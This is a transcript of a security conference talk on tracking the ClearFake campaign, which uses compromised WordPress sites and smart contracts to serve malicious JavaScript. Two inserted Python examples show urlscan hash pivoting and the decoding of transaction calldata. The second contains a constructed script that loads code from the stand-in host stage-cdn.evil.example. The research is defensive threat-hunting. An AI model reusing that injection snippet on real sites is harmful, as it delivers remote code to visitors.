campaign. So this was... I mean, the blog isn't actually loading, but this was actual research published by Sekoia. I can share the blog details later, but the research, what they did: this is the whole attack chain which they actually use. They compromise WordPress sites, and then they use all this JavaScript injection, they use smart contracts. They're ahead of us; like, actually, do you guys use any websites which implement smart contracts? No. But the attackers are very forward; they already use smart contracts to store their infrastructure and stuff, and then finally deliver the malware. So now, in their blog, what intrigued me was these three entries. So if you have... these are URL patterns;

basically, if you give these URL patterns in urlscan you'll understand the intermediate domain which is actually redirecting and all these. So these are heuristic-based URL patterns; you can upload them into your SIEM, and if it notices any patterns like this it'll alert you. But for me it was: I want these compromised WordPress sites. Why? Because I'll know what sites are there, and then I'll even prevent users from visiting those sites. So how did I go ahead and research? So here you can see there is a fake Chrome update page; when people go ahead and download and install it, it's a malware, they get affected

and it's done; the whole... whatever, ransomware, info stealer, all these samples get in, they can execute. Now this is how urlscan looks. Now here they have something called HTTP: when you visit a website it's not one request and one response, right? A lot happens in the back end, a number of requests to get images, etc., right? So you can track the same thing like this, in those HTTP transactions which you can see in urlscan. So the whole thing was... I was talking about Telegram and Steam getting abused, right? So similar to that, smart contracts: there is one simple function which stores information, and when someone

calls that smart contract it gives out that information. So I'm not sure how many of you know about smart contracts; if I speak about smart contracts a lot it'll take up the time, but if a smart contract is called, it's just a request, and then they get a response saying "this is the information you want". And what is that information? It's actually a malicious JavaScript which gets injected. So that's how it is. And here you can see this whole binance data seed, if it is visible. So Binance, you actually need to visit... it's a SaaS kind of thing; when you call that contract it gives you 4 KB of

malicious JavaScript, it gets executed, and then all these heuristic-based URLs come here. But before that, how do you get to know that even this contract is getting called, right? So they have a very special feature: when you get the hash of the response, you can search based on the hash. So here you can see I've searched this hash and found out nearly 7,000 websites having the same hash. So what does that mean? That specific hash is a contract call, and that is just 41 K... no, excuse me, that is just 41 bytes, I think. So I think you'll get the slides later, so you can later look at

the URL, all the things which I did. So there is one specific POST request which got a response of 41 bytes, so those 41 bytes are like an initiation. So you know how HTTPS works, right? There is some three-way handshake; in that first handshake it acknowledges that "yeah, I'm alive, just send your public certificate". So similar to that, a smart contract also has those 41 bytes saying "this is how it is, here you go". Now when I get the URL hash... and then, yeah, so this is the hash of those 31 bytes, and these are all the websites which actually implement that. Now where do you expect smart contracts to be used? In crypto

websites, crypto platforms, all these things. But you can see there is kimcartoon.vent.land, anad Design studio.com... why? I mean, even though there was a crypto boom, I don't think everyone uses smart contracts, right? So here the issue was that smart contract was actually a malicious call to fetch infected JavaScript, and then I came to know about it. So this one will contain false positives, because there are actually legitimate crypto websites which use smart contracts, but you can filter them out by looking at this. So you combine this initial tactic which I showed, using that hash, and you use that heuristic-based approach which they actually

shared; combining both of those you can remove false positives also. And yeah, so this is one where urlscan actually captured the screenshot. Later on they implemented measures so that even if urlscan captures it, it will not get detected, but because of this 41-byte hash we are still able to find out websites which are actually compromised. And basically, because of that, there is automation for this again; I'll not deep dive into that, but I got all those 7,000 websites from that, I filtered out the responses and then I processed them, and now you can see what are all the
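The two-step triage above (pivot on the response hash, then combine with the URL heuristics to drop the legitimate crypto sites), as an added Python example that is not the speakers' automation. `search_by_hash` calls the real urlscan search API with the `hash:` query the talk refers to; everything else works on a simplified stand-in for a urlscan result (only `page.domain` and the per-request URL and response hash are modelled). The heuristic regexes, the allowlist, the contract-call hash and the three scan records are all constructed; Sekoia's real URL patterns are not reproduced here.

```python
"""Pivot on a response hash in urlscan and cross-check with URL heuristics (added example)."""
import json
import re
import urllib.request


def search_by_hash(sha256, api_key=None, size=100):
    """Real urlscan.io search endpoint: scans whose HTTP responses include a body with this hash."""
    headers = {"API-Key": api_key} if api_key else {}
    req = urllib.request.Request(
        f"https://urlscan.io/api/v1/search/?q=hash:{sha256}&size={size}", headers=headers)
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp).get("results", [])


# Constructed stand-ins for the heuristic URL patterns the talk says Sekoia published.
HEURISTIC_PATTERNS = [re.compile(p) for p in (r"/[a-f0-9]{16}\.js$", r"/chrome-update/")]
# Constructed allowlist of sites that legitimately call smart contracts.
CRYPTO_ALLOWLIST = {"legit-dex.example"}
# Placeholder for the hash of the 41-byte contract-call response from the talk.
CONTRACT_CALL_HASH = "c" * 64


def classify_scan(scan, contract_hash, patterns=HEURISTIC_PATTERNS, allowlist=CRYPTO_ALLOWLIST):
    """Return a verdict for one scan, or None if the contract call never appeared in it.

    scan is a simplified urlscan result:
      {"page": {"domain": ...},
       "data": {"requests": [{"request": {"url": ...}, "response": {"hash": ...}}, ...]}}
    """
    domain = scan["page"]["domain"]
    requests = scan.get("data", {}).get("requests", [])
    saw_contract_call = any(r.get("response", {}).get("hash") == contract_hash for r in requests)
    if not saw_contract_call:
        return None
    if domain in allowlist:
        return "allowlisted"          # legitimate smart-contract user: the false-positive case
    heuristic_hit = any(p.search(r.get("request", {}).get("url", ""))
                        for r in requests for p in patterns)
    return "compromised" if heuristic_hit else "needs-review"


def triage(scans, contract_hash):
    """Map each domain that performed the contract call to its verdict."""
    verdicts = {}
    for scan in scans:
        verdict = classify_scan(scan, contract_hash)
        if verdict:
            verdicts[scan["page"]["domain"]] = verdict
    return verdicts


def _scan(domain, urls, hashes):
    """Build one constructed scan record in the simplified shape above."""
    return {"page": {"domain": domain},
            "data": {"requests": [{"request": {"url": u}, "response": {"hash": h}}
                                  for u, h in zip(urls, hashes)]}}


SAMPLE_SCANS = [  # constructed
    _scan("legit-dex.example", ["https://legit-dex.example/app.js"], [CONTRACT_CALL_HASH]),
    _scan("wp-blog.example",
          ["https://wp-blog.example/", "https://cdn-x.example/0123456789abcdef.js"],
          [CONTRACT_CALL_HASH, "d" * 64]),
    _scan("unknown-shop.example", ["https://unknown-shop.example/"], [CONTRACT_CALL_HASH]),
    _scan("clean-site.example", ["https://clean-site.example/"], ["e" * 64]),
]

if __name__ == "__main__":
    for domain, verdict in triage(SAMPLE_SCANS, CONTRACT_CALL_HASH).items():
        print(f"{domain}: {verdict}")
```

The "needs-review" bucket is where the talk's manual look at the domain list happens (a cartoon site calling a smart contract is suspicious even without a heuristic hit); the other two buckets are the automatable part.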

sites which got compromised, like YouTube downloader, Zoom, Line Network, all these, and then the urlscan results and then the domain out of it. And then later, basically, in a smart contract it's something like your transactions: only you give money, it updates the data inside. So think of it as a database, and when you call that database it gives you information; this smart contract was something like that. And for you to update the database you have to pay gas; so gas is something like a transaction fee for them, and that is how they found it, like they use it also. And then for each and every JavaScript

it is obfuscated, obviously, and you know, even though it was obfuscated, how do you deobfuscate? Any thoughts, how do you deobfuscate JavaScript? Okay, so you search for JavaScript deobfuscation tools; the first one was the one which they used, and it's very simple: you get the code, you deobfuscate, you get the malicious URL. So here in the third column it is the whole malicious infrastructure which I got. And then this is bonus code; if you want to take photos you can take them. So this is for scanning with urlscan: I gave the parameter, which is the hash, and I basically found out all the results and

stored them in an output file. So this is what it does. And the second one: basically, Binance didn't have any APIs to crawl the transactions, so what I did, I downloaded all the HTMLs. So it's simple crawling; ChatGPT will help you. I can't show that screenshot because I didn't find that screenshot of my ChatGPT where I asked for the code, but this is given by that only; like, who can write this good code? Because it has all the documentation and all, what each line of code does. So it was given by ChatGPT. And you know, here you can see transaction HTMLs; from each transaction HTML I extracted the

transaction hash and transaction ID, and from there I was able to get the JavaScript out of it. So here I write it into a response.txt and store it in one separate folder again. And then I'll not... hopefully everyone took a screenshot of it, if you want. And finally, in those transaction files there is some specific input called raw (soup dot this dot...). Have you guys heard of BeautifulSoup? Yeah, it's for crawling, right? So using BeautifulSoup I got a specific ID called raw input, so that is the input which is actually the malicious JavaScript. I got all the JavaScripts, and then I'll not bug you more about the same thing,

but if you go through the investigation which Sekoia did you will be able to deobfuscate the JavaScript and get actual domains out of it. And that's how I was able to get 579 more infected domains, which contained 95-plus actual malicious JavaScripts; so it was basically 95 transactions and four-plus malicious smart contracts. So four contracts were basically used to run their infrastructure. And then basically I processed those 7,800 results. On the current day, you get that hash, right? With that hash you can still run the investigation. Just before the presentation also I have checked: the campaign is still running, but not ClearFake, it's some
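The transaction-page step above, as an added Python example (not the speakers' script): read the raw input field out of a saved transaction HTML, decode the hex calldata, and pull the domains out of the stored script. The talk used BeautifulSoup; this version uses the standard library's `html.parser` so it runs with no extra packages. The element id `rawinput` is an assumption standing in for the "raw input" field the talk mentions, the 4-byte function selector is a placeholder, and the HTML page and the script stored in it are constructed. The decoder handles the common case of a single ABI-encoded `string` argument (selector, 32-byte offset, 32-byte length, padded bytes) and falls back to plain hex decoding otherwise, so it does not crash on a transaction that used a different layout. The final deobfuscation step from the talk is not reproduced; the example extracts domains from the decoded text as it stands.

```python
"""Recover the script stored in a transaction's raw input (added example)."""
import re
from html.parser import HTMLParser

RAW_INPUT_ID = "rawinput"  # assumed element id for the "raw input" field from the talk


class RawInputExtractor(HTMLParser):
    """Collect the text inside the element whose id is RAW_INPUT_ID."""

    def __init__(self):
        super().__init__()
        self._open_tag = None
        self.raw = ""

    def handle_starttag(self, tag, attrs):
        if self._open_tag is None and dict(attrs).get("id") == RAW_INPUT_ID:
            self._open_tag = tag

    def handle_endtag(self, tag):
        if tag == self._open_tag:
            self._open_tag = None

    def handle_data(self, data):
        if self._open_tag is not None:
            self.raw += data


def extract_raw_input(html):
    parser = RawInputExtractor()
    parser.feed(html)
    return parser.raw.strip()


def decode_calldata(hex_input):
    """Decode a single ABI-encoded string argument; fall back to raw bytes otherwise."""
    hex_input = hex_input.strip()
    if hex_input.startswith("0x"):
        hex_input = hex_input[2:]
    data = bytes.fromhex(hex_input)
    # Layout: 4-byte selector | 32-byte offset (from byte 4) | 32-byte length | bytes
    if len(data) >= 68:
        start = 4 + int.from_bytes(data[4:36], "big")
        if start + 32 <= len(data):
            length = int.from_bytes(data[start:start + 32], "big")
            payload = data[start + 32:start + 32 + length]
            if len(payload) == length:
                return payload.decode("utf-8", "replace")
    return data.decode("utf-8", "replace")  # not the expected layout: treat as raw text


DOMAIN_IN_URL = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def extract_domains(script_text):
    return sorted({m.lower() for m in DOMAIN_IN_URL.findall(script_text)})


def process_transaction_page(html):
    raw = extract_raw_input(html)
    script = decode_calldata(raw) if raw else ""
    return {"raw_input": raw, "script": script, "domains": extract_domains(script)}


def encode_string_call(selector, text):
    """Build calldata for one string argument (used only to construct the sample)."""
    padded = text + b"\x00" * (-len(text) % 32)
    body = selector + (32).to_bytes(32, "big") + len(text).to_bytes(32, "big") + padded
    return "0x" + body.hex()


SELECTOR = b"\x00\x00\x00\x00"  # placeholder selector, not a real contract's
SAMPLE_JS = (b"(function(){var s=document.createElement('script');"
             b"s.src='https://stage-cdn.evil.example/x.js';document.head.appendChild(s);})();")
SAMPLE_HTML = ('<html><body><div>Transaction Details</div><textarea id="rawinput" readonly>'
               + encode_string_call(SELECTOR, SAMPLE_JS) + '</textarea></body></html>')  # constructed

if __name__ == "__main__":
    result = process_transaction_page(SAMPLE_HTML)
    print(result["script"])
    print("domains:", result["domains"])
```

Saving each decoded script to its own file, as the talk does with `response.txt`, is a one-line addition after `process_transaction_page`; the domains list is what goes into the SIEM or content filter.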

other campaign; that ClearFake malware campaign switched to an adware campaign, and I don't know what it has switched to now, but you can still investigate, and it's still happening. And the takeaway: still now, use APIs or scripts wherever possible to enrich your information or get information. I've given you some samples, so whatever ideas you have got, brainstorm more; you'll get APIs and scripts to do something like that. And don't always rely on something you find on GitHub; we are way past the GitHub era, we are not script kiddies, we are ChatGPT kiddies. So you need to use ChatGPT to write code and basically understand the process of how the malware is delivered, so that lets you

actually understand the whole process and track them indefinitely. And all the data found by automations is ingestible; it can go into SIEMs, firewalls and content filtering systems. So that was it.